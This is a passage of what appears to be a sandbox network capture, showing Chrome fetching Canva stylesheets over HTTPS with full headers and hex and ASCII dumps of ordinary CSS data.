                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC382INData Raw: 2e 79 67 47 4b 54 51 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 65 78 74 2d 62 6f 74 74 6f 6d 7d 2e 79 67 47 4b 54 51 2e 5f 36 31 56 52 71 51 7b 68 65 69 67 68 74 3a 31 32 70 78 3b 77 69 64 74 68 3a 31 32 70 78 7d 2e 79 67 47 4b 54 51 2e 61 62 75 6c 62 67 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 7d 2e 79 67 47 4b 54 51 2e 41 41 77 43 65 67 7b 68 65 69 67 68 74 3a 31 38 70 78 3b 77 69 64 74 68 3a 31 38 70 78 7d 2e 79 67 47 4b 54 51 2e 64 52 38 4d 37 67 7b 68 65 69 67 68 74 3a 32 34 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 79 67 47 4b 54 51 2e 5f 31 61 43 6b 66 41 7b 68 65 69 67 68 74 3a 33
                                                                                                                                                                                                                                                                    Data Ascii: .ygGKTQ{box-sizing:border-box;display:inline-block;vertical-align:text-bottom}.ygGKTQ._61VRqQ{height:12px;width:12px}.ygGKTQ.abulbg{height:16px;width:16px}.ygGKTQ.AAwCeg{height:18px;width:18px}.ygGKTQ.dR8M7g{height:24px;width:24px}.ygGKTQ._1aCkfA{height:3


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    24192.168.2.1249745104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC806OUTGET /web/93584becc156c1fd.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1182INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 1570
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950e89db6334e-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49974
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "efc6909fc59746b60de7154e288a4654"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:20 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:20 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: W+ovUu3/Gpuo66hCt89rIW9aMM6J76SlSS19PSkAJXmdufLGT5sjq37i9GEA4auVFhNRhdYsOmc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8ZAXMJTAKCJGXP
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 5zJwA6WFSATBc4j0OBWWBlkiKd66HN21
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4e 63 48 48 4b 53 4d 6c 30 79 6f 34 71 59 76 75 62 77 6a 25 32 46 46 25 32 46 38 65 49 63 66 33 6f 25 32 42 49 76 4c 57 77 79 7a 6b 54 6a 48 68 76 48 52 6f 44 59 55 34 64 57 4f 7a 57 33 35 38 25 32 42 68 76 49 31 4a 73 69 7a 65 78 69 77 42 6f 54 44 43 70 78 37 42 4e 6a 74 41 33 30 71 38 53 55 4e 71 58 68 33 6f 4e 7a 38 37 4a 76 48 43 55 4e 7a 73 57 51 52 71 75 7a 6c 4e 37 53 74 54 43 72 65 6c 37 55 73 73 47 31 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NcHHKSMl0yo4qYvubwj%2FF%2F8eIcf3o%2BIvLWwyzkTjHhvHRoDYU4dWOzW358%2BhvI1JsizexiwBoTDCpx7BNjtA30q8SUNqXh3oNz87JvHCUNzsWQRquzlN7StTCrel7UssG14%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1204INData Raw: 2e 64 6b 57 79 70 77 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 7d 2e 64 6b 57 79 70 77 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 30 30 32 30 30 42 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 77 69 64 74 68 3a 30 7d 2e 64 6b 57 79 70 77 3e 73 76 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 52 33 42 55 70 77 7b 68 65 69 67 68 74 3a 31 32 70 78 3b 77 69 64 74 68 3a 31 32 70 78 7d 2e 75 52 57 78 56 41 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 7d 2e 4e 41 5f 49 6d 67 7b 68 65 69 67 68 74 3a 32 34 70 78 3b
                                                                                                                                                                                                                                                                    Data Ascii: .dkWypw{align-items:center;box-sizing:border-box;display:inline-flex}.dkWypw:before{content:"\00200B";line-height:1;width:0}.dkWypw>svg{display:block;height:100%;width:100%}.R3BUpw{height:12px;width:12px}.uRWxVA{height:16px;width:16px}.NA_Img{height:24px;
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC366INData Raw: 59 4f 4c 46 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 75 59 4f 4c 46 67 7b 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 31 31 29 7d 2e 4b 4e 41 39 63 41 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 77 51 77 56 47 77 2c 20 2e 31 72 65 6d 29 2a 31 34 29 7d 2e 45 33 45 73 68 77 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 7d 5b 64 69 72 3d 72 74 6c 5d 20 2e 45 33 45 73 68 77 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 7d 2e 5f 30 5a 6c 44 77 51 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 30 5a 6c 44 77 51 3e 69 6d 67 2c 2e 5f
                                                                                                                                                                                                                                                                    Data Ascii: YOLFg{border-radius:8px}.uYOLFg{height:calc(var(--wQwVGw, .1rem)*11)}.KNA9cA{border-radius:8px;height:calc(var(--wQwVGw, .1rem)*14)}.E3Eshw{transform:scaleX(-1) rotate(45deg)}[dir=rtl] .E3Eshw{transform:rotate(45deg)}._0ZlDwQ{display:block}._0ZlDwQ>img,._


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    25192.168.2.1249740104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:33 UTC806OUTGET /web/c3c941edff432236.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 14024
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950e8dace1a0f-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49974
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "faa6bf6be6dcf1172425616a752e665a"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:20 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:22 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 5U5eDNycj1NscDrki76vAOYcOuwVGaPuc0ALJThHMLIJsoMghjezTqK0zxk39bFACkY7/uUzjvU=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8V4KVYPZNFNE70
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: P3zoSL5GQgC0nM.XWQP7dUcfQlqN2Lmt
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6c 68 39 51 4e 5a 48 49 59 41 4b 61 64 4a 73 76 75 53 57 30 78 76 39 61 74 4a 72 42 25 32 42 67 64 63 6a 73 54 56 78 34 65 71 52 59 73 30 71 6c 31 33 4c 35 4b 4c 25 32 46 52 47 64 69 5a 38 56 31 4f 49 4c 25 32 42 55 7a 74 43 34 6d 6c 6f 5a 51 6e 4b 6e 5a 38 37 6b 58 70 50 71 25 32 46 59 62 44 33 67 30 47 71 72 5a 65 4c 77 34 44 76 77 63 4f 66 36 6f 48 75 31 49 68 63 57 50 39 55 70 6d 48 54 72 66 36 4d 4a 64 72 49 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lh9QNZHIYAKadJsvuSW0xv9atJrB%2BgdcjsTVx4eqRYs0ql13L5KL%2FRGdiZ8V1OIL%2BUztC4mloZQnKnZ87kXpPq%2FYbD3g0GqrZeLw4DvwcOf6oHu1IhcWP9UpmHTrf6MJdrI%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1203INData Raw: 2e 42 4d 4f 43 7a 51 7b 62 6f 72 64 65 72 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 4e 75 75 32 49 67 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 6e 6f 72 6d 61 6c 7d 2e 4d 59 62 36 30 41 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 54 6a 62 4d 42 67 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 74 61 72 74 7d 2e 5f 57 49 79 56 51 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 51 38 5f 7a 39 51 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 65 6e 64 7d 2e 59 67 48 44 6e 67 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c
                                                                                                                                                                                                                                                                    Data Ascii: .BMOCzQ{border:0;box-sizing:border-box;list-style:none;margin:0;padding:0}.Nuu2Ig{justify-content:normal}.MYb60A{justify-content:center}.TjbMBg{justify-content:start}._WIyVQ{justify-content:flex-start}.Q8_z9Q{justify-content:end}.YgHDng{justify-content:fl
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 67 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 36 75 2d 79 4a 51 29 7d 2e 7a 42 69 31 76 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 72 76 62 2d 41 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 56 66 6f 59 45 67 29 7d 2e 52 73 5f 74 4b 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 32 33 4c 38 67 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 66 65 43 77 35 67 29 7d 2e 6d 79 76 75 59 41 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 37 70 73 52 56 77 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 57 36 4b 74 73 41 29 7d 2e 72 67 77 55 71 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 44 58 75 65 59 77 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 4d 6a 6e 49
                                                                                                                                                                                                                                                                    Data Ascii: g);color:var(--6u-yJQ)}.zBi1vw{background-color:var(--yrvb-A);color:var(--VfoYEg)}.Rs_tKg{background-color:var(--c23L8g);color:var(--feCw5g)}.myvuYA{background-color:var(--7psRVw);color:var(--W6KtsA)}.rgwUqw{background-color:var(--DXueYw);color:var(--MjnI
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 4f 75 43 6b 43 51 29 7d 2e 71 54 78 75 56 41 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 7d 2e 5f 34 55 39 4b 65 51 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 5a 79 61 35 65 51 29 7d 2e 73 4d 30 57 7a 77 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 6e 4f 74 62 4f 67 29 7d 2e 6d 45 66 55 6e 51 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 4f 75 43 6b 43 51 29 7d 2e 52 4d 33 5f 6b 51 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 6e 6f 6e 65 7d 2e 5f 39 34 70 74 33 77 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 5a 79 61 35 65 51 29 7d
                                                                                                                                                                                                                                                                    Data Ascii: 1px solid var(--OuCkCQ)}.qTxuVA{border-bottom:none}._4U9KeQ{border-left:1px solid var(--Zya5eQ)}.sM0Wzw{border-left:1px solid var(--nOtbOg)}.mEfUnQ{border-left:1px solid var(--OuCkCQ)}.RM3_kQ{border-left:none}._94pt3w{border-right:1px solid var(--Zya5eQ)}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 57 31 71 34 41 29 3b 2d 2d 49 43 54 47 6b 67 3a 76 61 72 28 2d 2d 4d 65 6b 6c 37 77 29 3b 2d 2d 65 41 37 74 76 67 3a 76 61 72 28 2d 2d 49 43 54 47 6b 67 29 3b 70 61 64 64 69 6e 67 3a 76 61 72 28 2d 2d 43 31 5f 6d 6b 77 29 20 76 61 72 28 2d 2d 65 41 37 74 76 67 29 20 76 61 72 28 2d 2d 75 32 69 56 6d 67 29 20 76 61 72 28 2d 2d 6f 71 41 34 79 67 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 45 43 32 70 6a 77 7b 2d 2d 51 2d 38 45 6d 77 3a 76 61 72 28 2d 2d 67 6d 73 2d 70 77 29 3b 2d 2d 4b 32 4b 48 45 77 3a 76 61 72 28 2d 2d 51 2d 38 45 6d 77 29 3b 2d 2d 6e 7a 39 68 73 67 3a 76 61 72 28 2d 2d 54 50 73 67 61 77 29 3b 2d 2d 4d 65 6b 6c 37 77 3a 76 61 72 28 2d 2d 6e 7a 39 68 73 67 29 3b 2d 2d 4a 6d 47 74 56 77 3a 76 61 72 28
                                                                                                                                                                                                                                                                    Data Ascii: W1q4A);--ICTGkg:var(--Mekl7w);--eA7tvg:var(--ICTGkg);padding:var(--C1_mkw) var(--eA7tvg) var(--u2iVmg) var(--oqA4yg)}@media (min-width:600px){.EC2pjw{--Q-8Emw:var(--gms-pw);--K2KHEw:var(--Q-8Emw);--nz9hsg:var(--TPsgaw);--Mekl7w:var(--nz9hsg);--JmGtVw:var(
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 78 20 30 70 78 20 30 70 78 20 31 70 78 20 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 34 29 2c 30 70 78 20 32 70 78 20 34 70 78 20 2d 31 70 78 20 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 33 29 7d 2e 64 61 72 6b 7b 2d 2d 77 6c 73 6f 58 41 3a 30 70 78 20 30 70 78 20 30 70 78 20 31 70 78 20 23 33 62 33 63 33 64 2c 30 70 78 20 36 70 78 20 32 30 70 78 20 2d 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 35 29 3b 2d 2d 65 6a 36 70 42 67 3a 30 70 78 20 30 70 78 20 30 70 78 20 31 70 78 20 23 33 62 33 63 33 64 2c 30 70 78 20 31 32 70 78 20 34 30 70 78 20 2d 38 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 35 29 3b 2d 2d 33 4c 47 65 77 41 3a 30 70 78 20 30 70 78 20 30 70 78 20 31 70 78 20 23 33 62 33 63 33 64 2c 30 70 78 20 32 70 78 20 34 70 78
                                                                                                                                                                                                                                                                    Data Ascii: x 0px 0px 1px rgba(64,87,109,.04),0px 2px 4px -1px rgba(64,87,109,.3)}.dark{--wlsoXA:0px 0px 0px 1px #3b3c3d,0px 6px 20px -4px rgba(0,0,0,.45);--ej6pBg:0px 0px 0px 1px #3b3c3d,0px 12px 40px -8px rgba(0,0,0,.45);--3LGewA:0px 0px 0px 1px #3b3c3d,0px 2px 4px
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 70 67 3a 76 61 72 28 2d 2d 77 73 69 78 34 77 29 3b 2d 2d 6e 70 37 69 4a 41 3a 76 61 72 28 2d 2d 48 79 47 2d 70 67 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 30 30 70 78 29 7b 2e 74 71 5f 47 75 51 7b 2d 2d 69 6a 44 44 76 77 3a 76 61 72 28 2d 2d 44 32 31 45 69 51 29 3b 2d 2d 78 7a 56 49 6f 51 3a 76 61 72 28 2d 2d 69 6a 44 44 76 77 29 3b 2d 2d 72 37 33 33 75 41 3a 76 61 72 28 2d 2d 35 37 35 74 74 77 29 3b 2d 2d 63 71 56 4b 75 41 3a 76 61 72 28 2d 2d 72 37 33 33 75 41 29 3b 2d 2d 59 63 6e 33 46 41 3a 76 61 72 28 2d 2d 6d 4e 46 4d 63 51 29 3b 2d 2d 44 41 63 35 4b 41 3a 76 61 72 28 2d 2d 59 63 6e 33 46 41 29 3b 2d 2d 69 4c 59 61 69 41 3a 76 61 72 28 2d 2d 7a 7a 50 49 49 51 29 3b 2d 2d 53 44 63 39 44 77 3a 76 61 72 28 2d 2d 69 4c 59 61 69
                                                                                                                                                                                                                                                                    Data Ascii: pg:var(--wsix4w);--np7iJA:var(--HyG-pg)}}@media (min-width:900px){.tq_GuQ{--ijDDvw:var(--D21EiQ);--xzVIoQ:var(--ijDDvw);--r733uA:var(--575ttw);--cqVKuA:var(--r733uA);--Ycn3FA:var(--mNFMcQ);--DAc5KA:var(--Ycn3FA);--iLYaiA:var(--zzPIIQ);--SDc9Dw:var(--iLYai
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 34 6f 53 45 75 51 29 3b 2d 2d 4c 73 4a 37 37 41 3a 76 61 72 28 2d 2d 70 49 4b 62 51 77 29 3b 2d 2d 55 4d 35 6e 37 67 3a 76 61 72 28 2d 2d 57 77 57 4e 7a 41 29 3b 2d 2d 38 30 6d 47 66 77 3a 76 61 72 28 2d 2d 55 4d 35 6e 37 67 29 3b 2d 2d 5a 44 6b 5f 51 51 3a 76 61 72 28 2d 2d 46 47 31 48 69 51 29 3b 2d 2d 48 6c 76 69 55 77 3a 76 61 72 28 2d 2d 5a 44 6b 5f 51 51 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 4b 61 39 61 75 51 7b 2d 2d 6f 71 6a 6f 58 77 3a 76 61 72 28 2d 2d 70 49 4b 62 51 77 29 3b 2d 2d 4c 73 4a 37 37 41 3a 76 61 72 28 2d 2d 6f 71 6a 6f 58 77 29 3b 2d 2d 6c 51 46 6c 70 67 3a 76 61 72 28 2d 2d 55 4d 35 6e 37 67 29 3b 2d 2d 38 30 6d 47 66 77 3a 76 61 72 28 2d 2d 6c 51 46 6c 70 67 29 3b 2d 2d 75 51 77
                                                                                                                                                                                                                                                                    Data Ascii: 4oSEuQ);--LsJ77A:var(--pIKbQw);--UM5n7g:var(--WwWNzA);--80mGfw:var(--UM5n7g);--ZDk_QQ:var(--FG1HiQ);--HlviUw:var(--ZDk_QQ)}}@media (min-width:1200px){.Ka9auQ{--oqjoXw:var(--pIKbQw);--LsJ77A:var(--oqjoXw);--lQFlpg:var(--UM5n7g);--80mGfw:var(--lQFlpg);--uQw
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 69 38 37 63 67 3a 76 61 72 28 2d 2d 6c 49 58 30 57 67 29 3b 2d 2d 6f 68 44 67 4f 67 3a 76 61 72 28 2d 2d 79 69 38 37 63 67 29 3b 2d 2d 68 78 34 63 58 41 3a 76 61 72 28 2d 2d 79 69 38 37 63 67 29 3b 2d 2d 55 4f 76 62 75 77 3a 76 61 72 28 2d 2d 6f 68 44 67 4f 67 29 3b 2d 2d 66 71 71 62 73 67 3a 76 61 72 28 2d 2d 68 78 34 63 58 41 29 3b 67 72 69 64 2d 63 6f 6c 75 6d 6e 2d 67 61 70 3a 76 61 72 28 2d 2d 55 4f 76 62 75 77 29 3b 67 72 69 64 2d 72 6f 77 2d 67 61 70 3a 76 61 72 28 2d 2d 66 71 71 62 73 67 29 3b 2d 2d 53 38 77 69 49 41 3a 31 3b 2d 2d 30 33 39 79 6d 77 3a 76 61 72 28 2d 2d 53 38 77 69 49 41 29 3b 2d 2d 50 73 45 61 75 77 3a 61 75 74 6f 3b 2d 2d 4b 74 32 37 72 41 3a 76 61 72 28 2d 2d 50 73 45 61 75 77 29 3b 2d 2d 51 72 62 4a 55 41 3a 73 74 72 65 74 63
                                                                                                                                                                                                                                                                    Data Ascii: i87cg:var(--lIX0Wg);--ohDgOg:var(--yi87cg);--hx4cXA:var(--yi87cg);--UOvbuw:var(--ohDgOg);--fqqbsg:var(--hx4cXA);grid-column-gap:var(--UOvbuw);grid-row-gap:var(--fqqbsg);--S8wiIA:1;--039ymw:var(--S8wiIA);--PsEauw:auto;--Kt27rA:var(--PsEauw);--QrbJUA:stretc
